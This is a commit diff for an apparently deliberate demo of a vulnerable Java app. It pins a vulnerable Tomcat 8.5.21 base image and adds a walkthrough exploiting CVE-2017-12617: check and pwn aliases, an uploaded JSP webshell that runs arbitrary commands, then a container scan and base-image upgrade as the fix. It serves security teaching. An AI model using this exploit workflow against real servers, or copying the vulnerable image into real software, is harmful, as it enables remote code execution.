Dann72
diff --git a/‎Dockerfile
Lines changed: 4 additions & 7 deletions b/‎Dockerfile
Lines changed: 4 additions & 7 deletions
diff --git a/‎README.md
Lines changed: 13 additions & 1 deletion b/‎README.md
Lines changed: 13 additions & 1 deletion
diff --git a/‎exploits/tomcat-rce.sh
Lines changed: 6 additions & 0 deletions b/‎exploits/tomcat-rce.sh
Lines changed: 6 additions & 0 deletions
diff --git a/‎exploits/tomcat-rce/Dockerfile
Lines changed: 7 additions & 0 deletions b/‎exploits/tomcat-rce/Dockerfile
Lines changed: 7 additions & 0 deletions
diff --git a/‎exploits/tomcat-rce/README.md
Lines changed: 157 additions & 0 deletions b/‎exploits/tomcat-rce/README.md
Lines changed: 157 additions & 0 deletions
diff --git a/‎exploits/tomcat-rce/dpkg-cmd.png
498 KB b/‎exploits/tomcat-rce/dpkg-cmd.png
498 KB
@@ -1,15 +1,12 @@
 FROM maven:3-jdk-8-slim as build
 
 RUN mkdir /usr/src/goof
-RUN mkdir /tmp/extracted_files
 COPY . /usr/src/goof
 WORKDIR /usr/src/goof
+RUN --mount=target=$HOME/.m2,type=cache mvn install
 
-RUN mvn install
+FROM tomcat:8.5.21
 
-FROM tomcat:7.0.100
+RUN mkdir /tmp/extracted_files
+COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
 COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.war
-
-RUN apt-get update && apt-get install -y git && rm -rf /var/lib/apt/lists/*
- 
-
@@ -11,6 +11,8 @@ This repo is still incomplete, a work in progress to support related presentatio
 
 (from the original README)
 
+### Local build and run
+
 *Note that to run locally, you need JDK 8.*
 
 1.  Check out the project source code from github : `git clone https://github.com/snyk/java-goof.git`
@@ -19,7 +21,9 @@ This repo is still incomplete, a work in progress to support related presentatio
 4.  Browse the following URL : `localhost:8080/`
 5.  You can register a new account or login using the following credentials : [email protected] / foobar
 
-## Running with docker-compose
+### Build and run with docker-compose
+
+*Note, we run build on and a Tomcat 8.5 image here to support tomcat-rce base image demo.*
 ```bash
 docker-compose up --build
 docker-compose down
@@ -29,6 +33,14 @@ docker-compose down
 
 - [Heroku instructions](DEPLOY_HEROKU.md)
 
+## Open source vulnerability exploit
+
+TODO
+
+## Container base image vulnerability exploit
+
+- [Container base image exploit instructions](exploits/tomcat-rce/README.md)
+
 ## License
 This repo is available released under the [MIT License](http://opensource.org/licenses/mit-license.php/).
 # java-goof
@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+HOSTIP=$(ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1' | head -1)
+echo Detected $HOSTIP as your host IP
+docker build -t tomcat-rce tomcat-rce
+alias check="docker run --rm -it exploit -u http://${HOSTIP}:8080"
+alias pwn="docker run --rm -it exploit -u http://${HOSTIP}:8080 -p pwn"
@@ -0,0 +1,7 @@
+FROM python:3
+RUN apt-get update -y && apt-get install -y python-requests
+
+COPY exploit.py /exploit.py
+
+ENTRYPOINT [ "/exploit.py" ]
+
@@ -0,0 +1,157 @@
+# Docker base image vulnerability exploit
+
+## Prerequisites
+* Docker Desktop (Mac / Windows) or Docker-CE (Linux) installed
+* docker-compose installed  
+* java-goof app running in container as per top level [README](/README.md) instructions
+
+## Overview
+The default base image `tomcat:8.5.21` is vulnerable to RCE [CVE-2017-12617](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCAT-451514)
+and an demonstration exploit, taken from [Exploit-DB](https://www.exploit-db.com/exploits/42966) is available in the exploits directory.
+
+## Setting up the exploit
+With the app running locally on `0.0.0.0:8080` set up as follows:
+
+```bash
+cd exploits
+source tomcat-rce.sh   # Note: this will attempt to automatically grab your host IP and will echo it out, make sure it's correct for your OS
+```
+
+## Checking if app server is vulnerable
+Now you can run the `check` alias to see if the tomcat server is vulnerable.
+If it is you should see something similar to the following:
+
+```ascii
+$ check
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    
+
+[@intx0x80]
+
+Poc Filename  Poc.jsp
+File Created ..
+http://192.168.1.2:8080 it's Vulnerable to CVE-2017-12617
+http://192.168.1.2:8080/Poc.jsp
+```
+
+If you point a browser at http://localhost:8080/Poc.jsp you should get a test page with a bunch of "A" char's - that shows the exploit worked.
+
+## Inject the exploit and run commands in the container from browser 
+Next, run the `pwn` alias and just hit `ENTER` at the shell prompt that comes up. (Ignore the error afterward)
+
+```ascii
+$ pwn
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    
+
+[@intx0x80]
+
+Uploading Webshell .....
+$ 
+Traceback (most recent call last):
+  File "/exploit.py", line 188, in <module>
+    shell(str(url),pwn)
+  File "/exploit.py", line 98, in shell
+    cmd=input("$ ")
+  File "<string>", line 0
+    
+    ^
+SyntaxError: unexpected EOF while parsing
+```
+
+Now open a browser to http://localhost:8080/pwn.jsp
+
+You should see a blank page with a form containing single field and a `Run` button.  Type any Linux command you want and submit the form.
+The results will populate the page.
+
+Example 1: `whoami`
+![whoami command](whoami-cmd.png)
+
+Example 2: `dpkg -l`
+![debian package listing](dpkg-cmd.png)
+
+## Running a container scan
+From the repo top-level directory, find the image tag for the goof app.  If you built using `docker-compose up --build` then the image tag should be `java-goof_javagoof:latest`
+Run a scan with `--app-vulns` and dump the output to a file because it's going to be huge!
+
+```bash
+$ snyk container test java-goof_javagoof:latest --file=Dockerfile --app-vulns > snyk.out
+\ Analyzing container dependencies for java-goof_javagoof:latest/Dockerfile
+...
+```
+
+When complete, open the snyk.out file and search for `SNYK-JAVA-ORGAPACHETOMCAT-451514`
+```ascii
+  Upgrade org.apache.tomcat:[email protected] to org.apache.tomcat:[email protected] to fix
+  ✗ Arbitrary File Upload [High Severity][https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCAT-551994] in org.apache.tomcat:[email protected]
+    introduced by org.apache.tomcat:[email protected]
+  ✗ Denial of Service (DoS) [High Severity][https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCAT-451507] in org.apache.tomcat:[email protected]
+    introduced by org.apache.tomcat:[email protected]
+  ✗ Arbitrary Code Execution [High Severity][https://snyk.io/vuln/SNYK-JAVA-ORGAPACHETOMCAT-451514] in org.apache.tomcat:[email protected]
+    introduced by org.apache.tomcat:[email protected]
+```
+
+Next, search the file for `Recommendations`
+
+```ascii
+Tested 289 dependencies for known issues, found 594 issues.
+
+Base Image     Vulnerabilities  Severity
+tomcat:8.5.21  594              234 high, 173 medium, 187 low
+
+Recommendations for base image upgrade:
+
+Minor upgrades
+Base Image     Vulnerabilities  Severity
+tomcat:8.5.64  111              22 high, 12 medium, 77 low
+
+Major upgrades
+Base Image     Vulnerabilities  Severity
+tomcat:10.0.0  130              36 high, 17 medium, 77 low
+
+Alternative image types
+Base Image                             Vulnerabilities  Severity
+tomcat:8.5-jdk15-openjdk-oraclelinux7  0                0 high, 0 medium, 0 low
+tomcat:10.0-jdk16-corretto             0                0 high, 0 medium, 0 low
+tomcat:8.5-jdk8-corretto               0                0 high, 0 medium, 0 low
+tomcat:10-jdk15-corretto               0                0 high, 0 medium, 0 low
+```
+
+Kill the running docker-comose process to shut down the app.
+
+Edit the Dockerfile to have `FROM tomcat:8.5-jdk15-openjdk-oraclelinux7` at the top of the final stage.
+```dockerfile
+#FROM tomcat:8.5.21
+FROM tomcat:8.5-jdk15-openjdk-oraclelinux7
+RUN mkdir /tmp/extracted_files
+COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
+COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.war
+```
+
+Re-run `docker-compose up --build`
+
+Re-run `check` alias and you should see that the app server is no longer vulnerable.
+```ascii
+$ check
+   _______      ________    ___   ___  __ ______     __ ___   __ __ ______ 
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |____  |   /_ |__ \ / //_ |____  |
+ | |     \ \  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / / 
+ | |      \ \/ / |  __|______/ /| | | || |  / /______| | / / '_ \| |  / /  
+ | |____   \  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /   
+  \_____|   \/   |______|  |____|\___/ |_|/_/        |_|____\___/|_|/_/    
+
+[@intx0x80]
+
+Poc Filename  Poc.jsp
+Not Vulnerable to CVE-2017-12617 
+```
+
+You can alos show that http://localhost:8080/Poc.jsp did not inject the "AAAA" page